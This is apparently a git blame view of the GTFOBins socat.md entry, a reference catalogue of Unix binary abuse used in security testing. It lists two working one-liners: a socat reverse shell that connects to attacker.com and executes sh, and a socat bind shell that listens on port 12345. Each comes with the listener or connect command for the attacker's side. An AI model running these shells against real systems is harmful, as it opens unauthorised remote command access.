GTFOBins.github.io/_gtfobins/socat.md

17 lines
579 B
Markdown
Raw Normal View History

2018-05-22 22:40:27 +02:00
---
functions:
2018-05-25 15:30:02 +02:00
reverse-shell-interactive:
2018-07-04 20:26:52 +02:00
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on
the attacker box to receive the shell.
code: |
RHOST=attacker.com
RPORT=12345
socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
2018-05-25 15:30:02 +02:00
bind-shell-interactive:
2018-07-04 20:26:52 +02:00
- description: Run <code>socat FILE:`tty`,raw,echo=0 TCP:target.com:12345</code>
on the attacker box to connect to the shell.
code: |
LPORT=12345
socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane
2018-05-25 01:10:39 +02:00
---